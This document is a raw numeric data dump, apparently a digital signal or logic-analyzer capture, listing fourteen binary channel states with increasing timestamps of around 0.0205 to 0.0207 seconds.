1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450212e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450236e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450264e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450288e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450412e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450436e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450464e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450488e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450612e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450636e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450664e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450688e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450812e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450836e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450864e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450888e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0450968e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0450996e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451044e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451144e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451168e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451196e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451344e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451368e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451396e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451544e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451568e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451596e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451744e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451796e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451944e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0451964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0451996e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452044e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452144e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452196e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452344e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452396e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452544e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452596e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0452644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0452668e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0577644e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0577828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0577844e-02 0,0,1,1,0,0,0,0,0,0,0,1,0,1,2.0577876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0577900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0578228e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0578252e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0578280e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0578304e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0578328e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0578356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0578380e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0578404e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0578428e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0578452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578476e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578480e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578504e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578528e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578604e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578628e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578652e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578704e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578780e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578804e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578828e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578852e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578904e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578928e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0578956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0578980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579004e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579028e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579052e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579076e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579104e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579128e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579156e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579180e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579204e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579228e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579252e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579276e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579380e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579404e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579428e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579452e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579480e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579504e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579532e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579604e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579628e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579652e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579680e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579704e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579728e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579804e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579852e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579904e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579932e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0579956e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0579980e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580052e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580080e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580204e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580228e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580280e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580304e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580380e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580428e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580452e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580480e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580504e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580528e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580604e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580628e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580652e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580680e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580704e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580732e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580804e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580852e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580880e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580904e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580932e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0580956e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0580980e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581028e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581052e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581080e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581104e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581180e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581204e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581228e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581252e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581280e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581304e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581428e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581480e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581504e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581528e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581556e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581580e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581604e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581680e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581704e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581732e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581780e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581804e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581828e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581852e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581880e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581904e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581932e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0581956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0581980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582004e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582028e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582052e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582080e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582104e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582128e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582156e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582180e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582204e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582228e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582252e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582276e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582304e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582332e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582380e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582428e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582480e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582504e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582532e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582556e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582580e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582604e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582680e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582704e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582728e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582780e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582804e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582828e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582852e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582904e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582932e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0582956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0582980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583004e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583028e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583052e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583080e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583104e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583132e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583156e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583180e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583204e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583228e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583252e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583280e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583304e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583328e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583380e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583428e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583476e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583504e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583532e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583556e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583580e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583604e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583680e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583704e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583732e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583780e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583804e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583828e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583852e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583880e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583904e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583928e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0583956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0583980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584004e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584028e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584052e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584076e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584104e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584128e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584156e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584180e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584204e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584228e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584252e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584276e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584304e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584332e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584376e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584428e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584476e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584504e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584528e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584556e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584576e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584604e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584704e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584728e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584776e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0584804e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0584828e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0584836e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,2.0709548e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.0709756e-02 1,0,1,1,0,1,0,0,0,1,0,1,0,1,2.0709788e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.0709812e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,1,2.0710112e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.0710140e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0710144e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0710164e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0710188e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0710212e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0710236e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0710260e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0710284e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0710312e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.0710336e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.0710364e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710380e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710388e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710412e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710436e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710460e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710484e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710512e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710536e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710588e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710612e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0710620e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0710660e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0710688e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710692e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710712e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710736e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710764e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710788e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710812e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710836e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710860e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710884e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710912e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710936e-02 